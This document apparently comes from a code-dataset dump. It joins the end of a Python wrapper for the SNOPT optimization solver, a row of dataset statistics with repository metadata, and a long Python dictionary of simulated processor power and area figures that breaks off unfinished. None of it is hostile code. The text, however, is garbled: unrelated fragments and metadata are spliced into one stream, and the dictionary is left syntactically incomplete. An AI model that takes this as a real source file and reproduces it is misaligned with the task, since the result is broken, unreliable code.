rst = libsnopt.spGradSolve(fun, x0, nx, nf, nG, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def inSpGradSolve(fun, x0, nf=None, nG=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y, G, row, col, rec) where x, y are np.ndarray, J is scipy.sparse.csc_matrix
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, number of f
:param nG: int number nonzero in Jacobian
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
assert nG is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inSpGradSolve(fun, x0, nx, nf, nG, xlb, xub, clb, cub, cfg)
return parseResult(rst)
| 36.393013 | 113 | 0.62707 | 1,344 | 8,334 | 3.887649 | 0.096726 | 0.042488 | 0.036746 | 0.052823 | 0.896268 | 0.89378 | 0.89378 | 0.890144 | 0.889378 | 0.888804 | 0 | 0.010886 | 0.272498 | 8,334 | 228 | 114 | 36.552632 | 0.850734 | 0.474202 | 0 | 0.857143 | 0 | 0 | 0.00221 | 0 | 0 | 0 | 0 | 0 | 0.10084 | 1 | 0.058824 | false | 0 | 0.016807 | 0 | 0.134454 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
44969c415e8c6eaa548ddf4a55ec09ee734afa10 | 135,036 | py | Python | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | 1 | 2021-03-08T03:39:23.000Z | 2021-03-08T03:39:23.000Z | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | power = {'BUSES': {'Area': 3.70399,
'Bus/Area': 3.70399,
'Bus/Gate Leakage': 0.00993673,
'Bus/Peak Dynamic': 0.216542,
'Bus/Runtime Dynamic': 0.0281445,
'Bus/Subthreshold Leakage': 0.103619,
'Bus/Subthreshold Leakage with power gating': 0.0388573,
'Gate Leakage': 0.00993673,
'Peak Dynamic': 0.216542,
'Runtime Dynamic': 0.0281445,
'Subthreshold Leakage': 0.103619,
'Subthreshold Leakage with power gating': 0.0388573},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0723132,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.259487,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.391893,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.476432,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.321039,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.555923,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.36686,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.24382,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257251,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.359953,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.07797,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0740369,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0116379,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.111174,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0860694,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.18521,
'Execution Unit/Register Files/Runtime Dynamic': 0.0977073,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.288452,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.726224,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.16362,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00168503,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00168503,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00147496,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000574968,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00123639,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00608142,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0158954,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0827408,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.26302,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.202846,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.281025,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.74087,
'Instruction Fetch Unit/Runtime Dynamic': 0.588588,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0322611,
'L2/Runtime Dynamic': 0.00680373,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.68097,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.65482,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.111417,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.111417,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.20925,
'Load Store Unit/Runtime Dynamic': 2.3157,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.274735,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.54947,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0975043,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0979881,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.327235,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0332409,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.6543,
'Memory Management Unit/Runtime Dynamic': 0.131229,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.2763,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.258297,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0195243,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.163068,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.44089,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.64684,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0791433,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264851,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.427065,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.491905,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.352513,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.610425,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.402439,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36538,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.282968,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.385727,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.19487,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0806818,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127789,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.122051,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0945075,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202732,
'Execution Unit/Register Files/Runtime Dynamic': 0.107286,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.316606,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.796848,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.41199,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00182918,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00182918,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00159979,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000622896,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00135761,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00661576,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173034,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0908525,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.779,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.219694,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.308576,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.28227,
'Instruction Fetch Unit/Runtime Dynamic': 0.643042,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0541553,
'L2/Runtime Dynamic': 0.0114114,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.01726,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.81622,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.122297,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.122297,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.59713,
'Load Store Unit/Runtime Dynamic': 2.54164,
